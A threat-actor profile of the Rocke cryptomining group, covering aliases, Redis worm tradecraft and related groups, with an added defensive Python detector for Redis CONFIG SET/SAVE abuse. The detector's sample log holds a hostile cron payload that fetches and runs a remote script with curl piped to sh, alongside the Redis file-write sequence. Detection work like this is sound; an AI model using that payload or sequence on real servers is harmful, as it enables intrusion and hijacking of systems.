Rocke

Threat Actor, updated 2024-11-29T14:19:50.130Z
Rocke, also known as the Iron Cybercrime Group, is a financially motivated threat actor first documented by Cisco Talos in 2018. Talos linked the group to the deployment of an ELF backdoor and to cryptocurrency mining for profit; the group has also been associated with botnets and ransomware. Its malware and delivery methods have grown more sophisticated over time. One notable payload was UPX packed and behaved like the file "dDNLQrsBUE.url" dropped by "TermsHost.exe".

Rocke compromises exposed, vulnerable Redis instances and spreads in a worm-like manner. Other groups with the same Redis-and-worm tradecraft include Automated Libra (aka PurpleUrchin), Adept Libra (aka TeamTNT), Thief Libra (aka WatchDog), Money Libra (aka Kinsing) and Returned Libra (aka 8220); Palo Alto Unit 42 tracks Rocke itself under the name Aged Libra. No known links tie Rocke to those other groups, so the shared tradecraft should not be read as shared operators: overlapping TTPs against Redis are a weak basis for attribution on their own, and Rocke's operating style remains a distinct profile.

Rocke has also shown interest in browser-based JavaScript mining (CryptoNote) and in browser-based exploitation via the Browser Exploitation Framework (BeEF). These campaigns show the range of infection vectors, malware and infrastructure the group is willing to use. Evidence from GitHub suggests an affiliation between Rocke and Jiangxi Normal University, although the nature of that relationship remains unclear. The continuing evolution and diversification of Rocke's tactics make ongoing monitoring of and research into this actor worthwhile.
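The Redis tradecraft described above is shared by the Redis-targeting miner groups named on this page: an exposed, unauthenticated Redis instance is made to write its RDB dump into a cron spool or an .ssh directory by retargeting `dir` and `dbfilename` with CONFIG SET and then forcing a SAVE. The page does not detail Rocke's own Redis intrusion steps, so the following is an added example, not code from this page or from any vendor report it summarises, of a detection pass over Redis MONITOR output for that generic pattern. The log lines, client addresses, filenames and the URL in the cron payload are all constructed for the example.

```python
"""Added example: flag the CONFIG SET dir/dbfilename + SAVE pattern that
Redis-targeting miner groups use to drop cron jobs or SSH keys through an
exposed Redis instance. Input is Redis MONITOR output; the sample below is
constructed for this example and is not a real capture."""
import re
import shlex
from collections import defaultdict

# MONITOR line shape: <unix ts> [<db> <client addr>] "ARG" "ARG" ...
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<cmd>.*)$')

# Directories where an RDB dump becomes a scheduled task (assumed list; extend
# for your distribution).
CRON_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily")


def parse_monitor_line(line):
    """Return (timestamp, client, args) for one MONITOR line, or None if the
    line does not parse. Arguments are printed double-quoted; shlex unquotes
    them and keeps escaped payload bytes (e.g. \\n) as literal text."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), m.group("client"), shlex.split(m.group("cmd"))


def is_sensitive_target(dir_, dbfilename):
    """True when dir/dbfilename aim the dump at a cron spool or an .ssh dir."""
    d = dir_.rstrip("/")
    if d.startswith(CRON_DIRS):
        return True
    return d.endswith("/.ssh") or dbfilename == "authorized_keys"


def find_redis_file_write_abuse(lines):
    """Track CONFIG SET dir/dbfilename per client; report (client, dir,
    dbfilename) when that client then issues SAVE/BGSAVE with the dump
    pointed at a sensitive location."""
    state = defaultdict(dict)
    hits = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        _, client, args = parsed
        if not args:
            continue
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                state[client][key] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            cfg = state.get(client, {})
            d, f = cfg.get("dir", ""), cfg.get("dbfilename", "")
            if is_sensitive_target(d, f):
                hits.append((client, d, f))
    return hits


# Constructed MONITOR capture: one attacker session that plants a cron job,
# and one benign client that legitimately relocates its dump directory.
SAMPLE_MONITOR_LOG = """\
1723990000.001234 [0 203.0.113.7:51524] "CONFIG" "SET" "dir" "/var/spool/cron"
1723990000.002345 [0 203.0.113.7:51524] "CONFIG" "SET" "dbfilename" "root"
1723990000.003456 [0 203.0.113.7:51524] "SET" "x" "\\n*/1 * * * * curl -fsSL http://203.0.113.9/i.sh | sh\\n"
1723990000.004567 [0 203.0.113.7:51524] "SAVE"
1723990000.005678 [0 10.0.0.5:40110] "GET" "session:abc"
1723990000.006789 [0 10.0.0.5:40110] "CONFIG" "SET" "dir" "/var/lib/redis"
1723990000.007890 [0 10.0.0.5:40110] "BGSAVE"
"""

if __name__ == "__main__":
    for client, d, f in find_redis_file_write_abuse(SAMPLE_MONITOR_LOG.splitlines()):
        print(f"suspicious RDB write by {client}: dir={d!r} dbfilename={f!r}")
```

The detector keys on the state change rather than on a single command, because CONFIG SET dir alone is routine administration; it is the combination of a sensitive target and a forced dump from the same client that marks the technique. A second benign client changing `dir` to a normal data directory produces no alert. The cheaper control is to remove the precondition entirely: bind Redis to loopback or a private interface, require AUTH, and rename or disable CONFIG for untrusted clients.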
Description last updated: 2024-06-11T09:16:48.193Z
Possible Aliases / Cluster overlaps
Cluster overlaps and naming conventions between vendors are hard to track, so the following overlapping names / profiles may also be worth looking at.
Alias: Iron Cybercrime Group (2 votes)
Description: Iron Cybercrime Group is a possible alias for Rocke. The Iron Cybercrime Group, also known as Rocke, is a notable threat actor in the cybersecurity landscape. This group is responsible for executing actions with malicious intent, typically driven by financial motivations. Threat actors like this can range from individuals to private companies or even
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Cybercrime
Backdoor
Source Document References
Information about the Rocke Threat Actor was read from the documents corpus below (display limited to 20 results).